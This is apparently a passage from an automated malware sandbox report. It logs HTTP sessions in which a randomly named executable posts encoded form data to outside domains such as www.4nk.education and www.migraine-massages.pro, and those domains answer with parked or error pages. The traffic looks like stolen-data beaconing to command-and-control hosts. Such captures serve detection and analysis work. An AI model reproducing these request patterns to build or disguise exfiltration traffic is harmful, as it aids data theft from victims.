                                                                                                                                2192.168.2.649923217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:25:48.672698975 CET664OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.4nk.education
                                                                                                                                Origin: http://www.4nk.education
                                                                                                                                Referer: http://www.4nk.education/gnvu/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 4b 42 6c 59 4a 39 43 4b 4c 33 4f 58 66 62 36 63 69 50 5a 50 78 71 78 52 47 6c 71 32 68 50 67 48 6f 72 51 4b 33 50 2b 4a 69 44 53 67 3d 3d
                                                                                                                                Data Ascii: bdlD=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDKBlYJ9CKL3OXfb6ciPZPxqxRGlq2hPgHorQK3P+JiDSg==
                                                                                                                                Nov 18, 2024 16:25:49.506694078 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:25:49 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.649938217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:25:51.218940020 CET1677OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.4nk.education
                                                                                                                                Origin: http://www.4nk.education
                                                                                                                                Referer: http://www.4nk.education/gnvu/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 59 65 47 4e 37 49 77 79 6b 6b 44 31 57 6a 34 71 5a 2f 50 39 6e 66 42 31 76 32 2f 75 69 4d 66 72 35 63 70 6e 4f 71 35 33 55 2b 70 47 38 31 4f 63 53 76 34 4d 66 74 45 4b 5a 48 64 2f 47 4c 50 44 50 36 63 4e 2f 47 66 78 7a 70 49 58 47 46 65 35 30 78 36 47 70 4b 63 73 57 31 6d 51 35 43 71 77 7a 35 64 49 69 6c 66 46 78 57 63 4b 6e 4c 33 6e 38 69 32 4c 50 50 41 4d 74 46 6d 73 56 5a 70 4b 6a 56 79 6a 64 59 72 4c 54 4d 54 45 68 69 5a 56 31 41 77 38 58 4f 43 44 6d 47 33 30 64 67 36 34 42 6d 74 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qYeGN7IwykkD1Wj4qZ/P9nfB1v2/uiMfr5cpnOq53U+pG81OcSv4MftEKZHd/GLPDP6cN/GfxzpIXGFe50x6GpKcsW1mQ5Cqwz5dIilfFxWcKnL3n8i2LPPAMtFmsVZpKjVyjdYrLTMTEhiZV1Aw8XOCDmG30dg64BmtvwKP1NVM5MR9N7d7ICPDorYG2egWimG7VAF/KpqWerTiHu2OCL9Da0MZQDpiF0U7iviYVXGRcDR96z/9NZKNRS00yKlIKnn15RWNJcPsPnarp+Kab4s02Xj+CDnZN0n2UGV/iIa1EtLjEh23Oaf5+kuQleYoa4Mz9ndgnA0renzx2IpG2r4MfNhF1cNUceuHmQJnHJVrYu7JC1p4ggi8HYsuBJAGr4f0rGNgi9DdB5L7vKNH3f5uFc2os3OY3Wj1sn1hk854uofS4Vvko5V/CKj2aa+1Q9zEYN5IOCzzaOEvbZgg/XXdIWJ8iensiAECgSu2Evf1dD5aBagtYVbBF3jA1nA3krEqyX6qDPTfYM3Vlh4JBTGxdvWT3fdPSvfLiUVVEkK/6NeNjTtrb4clUYyWd+LODVAddM6SFT9tf/ibYRSBFQ6neunSag9kmLtcd5aA18LI308YubmyWf45AerI5sKWz57E3xn4RUVuqszGpeciPZWNEQtQVSaHLYq0tzzlNpOTOipe1WecNz3sDkTd97SRrs9XJCN3qY3bWbObG8AkU/G/y27CP0HxDcYjTQ0JKziIbv7Fi+AFmCcanH8eOZJC1A3FA1KRzeq+prJT6341X2rItQu3R+rnsnkhrk30hExvmGG3m3wWmBJvnLZSlYDRMzTd6L [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:25:52.011579037 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:25:51 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.649952217.70.184.50801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:25:53.947909117 CET389OUTGET /gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.4nk.education
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:25:54.789060116 CET1236INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:25:54 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                Content-Security-Policy: default-src 'self'; script-src 'nonce-4999172512364af7b0aa14c9f9783b3b';
                                                                                                                                Vary: Accept-Language
                                                                                                                                Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 34 39 39 39 31 37 32 35 31 32 33 36 34 61 66 37 62 30 61 61 31 34 63 39 66 39 37 38 33 62 33 62 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-4999172512364af7b0aa14c9f9783b3b';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
                                                                                                                                Nov 18, 2024 16:25:54.789132118 CET1236INData Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
                                                                                                                                Nov 18, 2024 16:25:54.789165020 CET161INData Raw: 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c
                                                                                                                                Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>
                                                                                                                                Nov 18, 2024 16:25:54.789195061 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.649986199.59.243.227801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:00.157017946 CET664OUTPOST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 78 6b 7a 4c 43 67 70 47 32 78 4a 77 43 79 73 78 69 64 4f 44 37 71 76 67 43 30 63 34 56 6d 31 43 6e 45 42 58 49 48 56 51 48 2b 71
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CxkzLCgpG2xJwCysxidOD7qvgC0c4Vm1CnEBXIHVQH+q
                                                                                                                                Nov 18, 2024 16:26:00.735748053 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:00 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: 064062cb-28b2-458a-bbd8-7e2e3ff1c9df
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=064062cb-28b2-458a-bbd8-7e2e3ff1c9df; expires=Mon, 18 Nov 2024 15:41:00 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Nov 18, 2024 16:26:00.735800982 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDY0MDYyY2ItMjhiMi00NThhLWJiZDgtN2UyZTNmZjFjOWRmIiwicGFnZV90aW1lIjoxNzMxOTQzNT


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.649989199.59.243.227801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:02.709602118 CET688OUTPOST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4b 74 67 41 73 75 34 31 6d 66 41 6e 38 42 46 66 4c 79 66 7a 62 4a 4e 7a 47 30 59 42 4d 71 45 56 37 51 6a 32 4f 53 62 35 4c 43 6f 77 3d 3d
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrKtgAsu41mfAn8BFfLyfzbJNzG0YBMqEV7Qj2OSb5LCow==
                                                                                                                                Nov 18, 2024 16:26:03.375417948 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:02 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: 7101e31f-801f-440f-a114-dde4c9b88e01
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=7101e31f-801f-440f-a114-dde4c9b88e01; expires=Mon, 18 Nov 2024 15:41:03 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
